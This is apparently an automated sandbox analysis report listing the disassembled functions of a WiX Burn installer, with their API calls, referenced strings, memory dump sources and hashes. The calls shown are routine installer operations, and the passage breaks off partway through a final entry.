Opcode Fuzzy Hash: 9cd63f7c784d4b0bb7a0ce3ba8cdb139e60d781fce80652a7e667fdd837a098b
Instruction Fuzzy Hash: D611D525600321E6EF311BA14C44FBBB65EEF55B60F114126FF05DBA50DF608C0392A1

Function 6C8D534A Relevance: 7.7, APIs: 5, Instructions: 213windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 6C8D5355
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8D5480
SetWindowLongW.USER32(?,000000EB,00000000), ref: 6C8D54B4
PostQuitMessage.USER32(00000000), ref: 6C8D54BC
SetWindowLongW.USER32(?,000000EB,00000000), ref: 6C8D54D1

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: LongWindow$Message$PostQuitSend
String ID:
API String ID: 1409866109-0
Opcode ID: 5ef5d3e7f954433034bd07f18f2acea107594914efe0cab8fb02c70a5a455116
Instruction ID: 468f1d102d385c661d53a56708339cfcb654a9b29a776932ed44b9216eef13fc
Opcode Fuzzy Hash: 5ef5d3e7f954433034bd07f18f2acea107594914efe0cab8fb02c70a5a455116
Instruction Fuzzy Hash: 8E51A4B435571597DA321ABC8B14B6E3633EB4271AF134E27E5229AE94CF34FE018742

Function 6C8D6F60 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(mbapreq.wxl,00000000,?,00000000,00000000,?,6C8D1D15,00000000,mbapreq.wxl,?,00000000,?,00000000,?,?,?), ref: 6C8D6FC0
GetSystemDefaultUILanguage.KERNEL32(00000000,00000000,00000000,00000000,00000000,?), ref: 6C8D7078

Part of subcall function 6C8D65CB: FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?), ref: 6C8D6606
Part of subcall function 6C8D65CB: FindClose.KERNELBASE(00000000), ref: 6C8D6612

Strings

%u\%ls, xrefs: 6C8D6FD4, 6C8D7037, 6C8D708C, 6C8D70EB
mbapreq.wxl, xrefs: 6C8D6F75

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: DefaultFind$CloseFileFirstLangLanguageSystemUser
String ID: %u\%ls$mbapreq.wxl
API String ID: 2342833387-3698500817
Opcode ID: e7dc7185fd3d3ab1c7fab100b1f04b847326da0117026f36630074511995a144
Instruction ID: 5d56cee79f13778cb208b69dccf0aa592b702af3780ac06798ea736814967caf
Opcode Fuzzy Hash: e7dc7185fd3d3ab1c7fab100b1f04b847326da0117026f36630074511995a144
Instruction Fuzzy Hash: D451B372D01529BBDF359AA58E01BEE76B8AF04714F120AB5ED00E7A44E734EE0597A0

Function 6C8DCBAF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C8DCBC9
SysAllocString.OLEAUT32(00000000), ref: 6C8DCBD9
VariantClear.OLEAUT32(00000000), ref: 6C8DCCBA

Strings

xmlutil.cpp, xrefs: 6C8DCBF1

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: 6cb7a5edbd2bd67bbe580dfcaf9968838c8d1714526890b97b5320ed5d97bc27
Instruction ID: 0e2f2adfb209a8f7c9f07a1df0b1ac4631713c175ba17092eb20f6770b109269
Opcode Fuzzy Hash: 6cb7a5edbd2bd67bbe580dfcaf9968838c8d1714526890b97b5320ed5d97bc27
Instruction Fuzzy Hash: E34185B5D01615ABCB21EFA9D988E9E7BB8EF05314B0346A5ED15EB701D730D900CB90

Function 6C8D5939 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 6C8D5978
GetLastError.KERNEL32 ref: 6C8D5982
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 6C8D59EA

Strings

msctls_progress32, xrefs: 6C8D5957

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID: msctls_progress32
API String ID: 1230559179-3107856198
Opcode ID: 07423b694b6598934a7774fd5f62edec87ad193a0a4d78e4ba14ad8d18599514
Instruction ID: bb52f840aeb31a41a19ff06917e561fabdf0ac16af98311e5905544261ff8bc8
Opcode Fuzzy Hash: 07423b694b6598934a7774fd5f62edec87ad193a0a4d78e4ba14ad8d18599514
Instruction Fuzzy Hash: 2621D6B6901329A7DB30DB689E44FDB77A8DF05764F1209B6AD14E7640E630ED4487E0

Function 006D0658 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,006CFF0B,?,?,00000000,00000000,0000FDE9), ref: 006D066A
WriteFile.KERNELBASE(0000020C,00000000,00000000,00000000,00000000,?,?,006CFF0B,?,?,00000000,00000000,0000FDE9), ref: 006D06A6
GetLastError.KERNEL32(?,?,006CFF0B,?,?,00000000,00000000,0000FDE9), ref: 006D06B0

Strings

logutil.cpp, xrefs: 006D06E0

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 25ebcad2ead243d6cabd7885e833edacd1c0686a78fa4c9a37ae107eed926476
Instruction ID: 9dedd9ff5e85fab66420b4f3f2ca26cb7dae3a7514aefcfc3e3dd1bbe2c7f719
Opcode Fuzzy Hash: 25ebcad2ead243d6cabd7885e833edacd1c0686a78fa4c9a37ae107eed926476
Instruction Fuzzy Hash: 1511C672E01225ABA7109AAA9C44EEFBB6EEBC4760F014216FD05D7340D630DD10C6F4

Function 6C8D34D8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000005,?,?,?,?,?,?,?,?,?,?,00000005,00000000,?,00000000), ref: 6C8D3527

Strings

Running detect BA function, xrefs: 6C8D34E6
Failed to start detecting chain., xrefs: 6C8D3547
Failed calling detect BA function., xrefs: 6C8D3505

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: ShowWindow
String ID: Failed calling detect BA function.$Failed to start detecting chain.$Running detect BA function
API String ID: 1268545403-266677022
Opcode ID: ad056456dd0aeab1fdb5bd815dbe524b538e107f8fa30badc2deb553723db223
Instruction ID: a52dc681660f7aa723fcfa9a3fa96359e65d0fbc518fb26a23c2948a1e8f47ba
Opcode Fuzzy Hash: ad056456dd0aeab1fdb5bd815dbe524b538e107f8fa30badc2deb553723db223
Instruction Fuzzy Hash: C001A132600911AFC2359A18DE44FABBBB5AF85725F120859F5009BB90DB62BC02CB90

Function 006B074E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006B114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,006B077D,?,?,?), ref: 006B1177
Part of subcall function 006B114F: GetLastError.KERNEL32(?,006B077D,?,?,?), ref: 006B1181

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 006B078B
GetLastError.KERNEL32 ref: 006B0795

Strings

cabextract.cpp, xrefs: 006B07B9
Failed to read during cabinet extraction., xrefs: 006B07C3

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 4eb6b159b290ad5d557ced98e6fa7fa83cf53a11e4b60dca5eb9071fb2ccb544
Instruction ID: 6231a491bed4f04747fbb6ecbe9ae97d8d2e83c500d726329225d5ec30d709bd
Opcode Fuzzy Hash: 4eb6b159b290ad5d557ced98e6fa7fa83cf53a11e4b60dca5eb9071fb2ccb544
Instruction Fuzzy Hash: C1016572A01264FBDB109FA9DC05E9A7BAAFF05760F01011AFD09D7650D7319A11DBD4

Function 006B114F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,006B077D,?,?,?), ref: 006B1177
GetLastError.KERNEL32(?,006B077D,?,?,?), ref: 006B1181

Strings

Failed to move to virtual file pointer., xrefs: 006B11AF
cabextract.cpp, xrefs: 006B11A5

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: b11979cf3ce6721ad0c8e6b519beb5f73540bc2b9d822b0546e3e463d591471f
Instruction ID: a3477f685a79c640080bbf463a96785ea39f2541c97f75c5de8e71e693a951dd
Opcode Fuzzy Hash: b11979cf3ce6721ad0c8e6b519beb5f73540bc2b9d822b0546e3e463d591471f
Instruction Fuzzy Hash: 21012B76601335BBDB115AAA9C04EC7BF9BEF02770B01812AFD189A610D7319C10C7E4

Function 006B051A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(006DB468,00000000,?,006B145A,?,00000000,?,0069C121,?,006952FD,?,006A73B2,?,?,006952FD,?), ref: 006B0524
GetLastError.KERNEL32(?,006B145A,?,00000000,?,0069C121,?,006952FD,?,006A73B2,?,?,006952FD,?,0069533D,00000001), ref: 006B052E

Strings

cabextract.cpp, xrefs: 006B0552
Failed to set begin operation event., xrefs: 006B055C

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: fba44d6a3274b3ced186998f171a5c121d8a8872c1e50fa5ee2e98c073aa47ae
Instruction ID: 813a78a529a78c59e04c22adf4b329bd37f1473890902f600eb27221294f481e
Opcode Fuzzy Hash: fba44d6a3274b3ced186998f171a5c121d8a8872c1e50fa5ee2e98c073aa47ae
Instruction Fuzzy Hash: FFF0A773E01730A6AB2066FA6D05ADB76DADF05760B02112AFD09E7550E6149D4046E9

Function 6C8DC145 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C8DC154
SetWindowTextW.USER32(00000000,6C8D2267), ref: 6C8DC162
GetLastError.KERNEL32(?,6C8D2267,?,00000418,?), ref: 6C8DC16C

Strings

thmutil.cpp, xrefs: 6C8DC190

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: ErrorItemLastTextWindow
String ID: thmutil.cpp
API String ID: 1272195076-2961750086
Opcode ID: b03e5c9c3cd719cefc7c3ec9f12900f3567f54e170f6084acf2c4850c9975338
Instruction ID: e802a37167f383482252ab636367ee9f83522250c992def6c398321bc3bdbda3
Opcode Fuzzy Hash: b03e5c9c3cd719cefc7c3ec9f12900f3567f54e170f6084acf2c4850c9975338
Instruction Fuzzy Hash: B8F08C36740234ABEB716EAA8D08A8B7BE8EF19695B024524BD19D7210DA31D810CBE0

Function 6C8D6B9B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,String,00000000,00000000,00000000,?), ref: 6C8D6BC0
GetLastError.KERNEL32 ref: 6C8D6BFD

Part of subcall function 6C8D5B06: GetProcessHeap.KERNEL32(?,?,?,6C8D79BF,?,00000001,?,00000000,?,6C8D8077,?,?,00000001,?,6C8DD455,?), ref: 6C8D5B17
Part of subcall function 6C8D5B06: RtlAllocateHeap.NTDLL(00000000,?,6C8D79BF,?,00000001,?,00000000,?,6C8D8077,?,?,00000001,?,6C8DD455,?,00000001), ref: 6C8D5B1E

Strings

String, xrefs: 6C8D6BAA
locutil.cpp, xrefs: 6C8D6BE1, 6C8D6C41

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: ErrorHeapLast$AllocateProcess
String ID: String$locutil.cpp
API String ID: 669838880-2823821818
Opcode ID: 96de40cf64ca547a1b5a18476795310b74619e48bbf0f279d9cce9fc85aae84b
Instruction ID: e86d04ca7847d1aff2629cbac5e44f87bd75c26cb47fbe61c7555f98bf305682
Opcode Fuzzy Hash: 96de40cf64ca547a1b5a18476795310b74619e48bbf0f279d9cce9fc85aae84b
Instruction Fuzzy Hash: B641A274A01218EBDB319F69DA84A9ABBB8EF40354B138D69EC05DF611D731ED00CBA0

Function 6C8D3561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00008066,00000000,?), ref: 6C8D3638

Strings

Ignoring attempt to only cache a bundle that does not explicitly support it., xrefs: 6C8D3605
Running detect complete BA function, xrefs: 6C8D357B

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: MessagePost
String ID: Ignoring attempt to only cache a bundle that does not explicitly support it.$Running detect complete BA function
API String ID: 410705778-194666019
Opcode ID: d17f0a8b2761d08336ef969f39b7b1e2e588fe845893610bc008ea7592289bcd
Instruction ID: cff86651bb47e75de144628bc95c20a4b984ea3b42340685d8962ca9e4b02f7a
Opcode Fuzzy Hash: d17f0a8b2761d08336ef969f39b7b1e2e588fe845893610bc008ea7592289bcd
Instruction Fuzzy Hash: B1218032601B009FDB305E65A685A96B3F5EB44729F264C2EE26A47A50EB71BC41CB50

Function 6C8DD046 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64memoryfilewindowCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010,00000000,00000000,?,?,6C8DA52B,?,00000000,?,00000000,00000000,00000000,ImageFile,00000000,00000000,ImageResource), ref: 6C8DD069
GdipCreateBitmapFromFile.GDIPLUS(00000000,00000000,00000010,00000000,00000000,?,?,6C8DA52B,?,00000000,?,00000000,00000000,00000000,ImageFile,00000000), ref: 6C8DD085

Strings

gdiputil.cpp, xrefs: 6C8DD05A, 6C8DD0A3, 6C8DD0C5

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFileFrom
String ID: gdiputil.cpp
API String ID: 2762118622-3769319569
Opcode ID: 7949aca6307392e17c7ee81424b7188a8109127f861a6461adc8d6d0de606bab
Instruction ID: 03321db73b3c2962bbbf5082c74ac71e1f1623836affebd8552afe0b3be37f64
Opcode Fuzzy Hash: 7949aca6307392e17c7ee81424b7188a8109127f861a6461adc8d6d0de606bab
Instruction Fuzzy Hash: 7F112732140315A7C3319E59CA44F4B3BA4ABC5B64F128C1AF9549FB40CB75EC068FB1

Function 0069501B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00691104,?,?,00000000), ref: 0069503A
CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00691104,?,?,00000000), ref: 0069506A

Strings

burn.clean.room, xrefs: 00695027, 00695034, 00695061

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 3efa81f62492f85713677210e3c7a29fb12d3d217f18fb660f6a4f170d9fbf68
Instruction ID: 6e37404845c89ac9c0e592b02937bba312ebe68b210090e91e7ad25226436f3c
Opcode Fuzzy Hash: 3efa81f62492f85713677210e3c7a29fb12d3d217f18fb660f6a4f170d9fbf68
Instruction Fuzzy Hash: E10186B2500625AE87214F999C84DB7B76FFB187507105117FA4EC3B20D7719C54C7E2

Function 6C8D43F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000051A7,?,00000000,?), ref: 6C8D4413
GetLastError.KERNEL32 ref: 6C8D4423

Strings

WixStandardBootstrapperApplication.cpp, xrefs: 6C8D4447

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: CreateErrorLastThread
String ID: WixStandardBootstrapperApplication.cpp
API String ID: 1689873465-3796977662
Opcode ID: 1c4caec95419ed9e11277995895b1b38c6c88b4b29954768938a30cb0b333511
Instruction ID: c3e64883cd83977a71141a1f5342314b5d86dc370d81dadf43093e73dc95f855
Opcode Fuzzy Hash: 1c4caec95419ed9e11277995895b1b38c6c88b4b29954768938a30cb0b333511
Instruction Fuzzy Hash: CEF05E76640249BBEB319A6B8D08EA77AFDEBC6655F02052AF914D3600EA309901D7B0

Function 6C8DAC04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 6C8DAC17
GetLastError.KERNEL32 ref: 6C8DAC21

Strings

thmutil.cpp, xrefs: 6C8DAC45

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: thmutil.cpp
API String ID: 1948546556-2961750086
Opcode ID: 751758decefa1107bc9544b5b3fb092d8359a876b12b45259b76baf256e49a0d
Instruction ID: 78f510dc58a299681db103cd8676ea66863fc0f3515ec67d2e9ffbbdc58544d1
Opcode Fuzzy Hash: 751758decefa1107bc9544b5b3fb092d8359a876b12b45259b76baf256e49a0d
Instruction Fuzzy Hash: C3E0653360023867DB325EAA9D04AC77EA4EF05691F024525FE04D7110D221DC10D7E4

Function 6C8DC1E6 Relevance: 4.6, APIs: 3, Instructions: 86windowCOMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 6C8DC24A
ShowWindow.USER32(?,00000000,?,?,?,?,?,6C8D2CB1,?,?,00000000,?,?), ref: 6C8DC26F
SetFocus.USER32(00000000,?,?,6C8D2CB1,?,?,00000000,?,?), ref: 6C8DC2C0

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: CallbackDispatcherFocusShowUserWindow
String ID:
API String ID: 334017688-0
Opcode ID: e8581fcc6b1a1d37d48adfa60a75c1eaba61307000503a0cefca4e781ce2a875
Instruction ID: 7584a760cb45092d0787b6e5344e515c17c836c0c6da7fac5519e090f1e40d6c
Opcode Fuzzy Hash: e8581fcc6b1a1d37d48adfa60a75c1eaba61307000503a0cefca4e781ce2a875
Instruction Fuzzy Hash: BF31F431504204EBCB25EF98CA80B6A37B5FF45718F12896DFD168BA46C731E981CB90

Function 006937EA Relevance: 4.6, APIs: 3, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00693829
GetLastError.KERNEL32 ref: 00693833
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 0069389B

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 67747f5d2486f7d7b4148ce79a92e77449f30c78a2079d0d8d566a7f268b316f
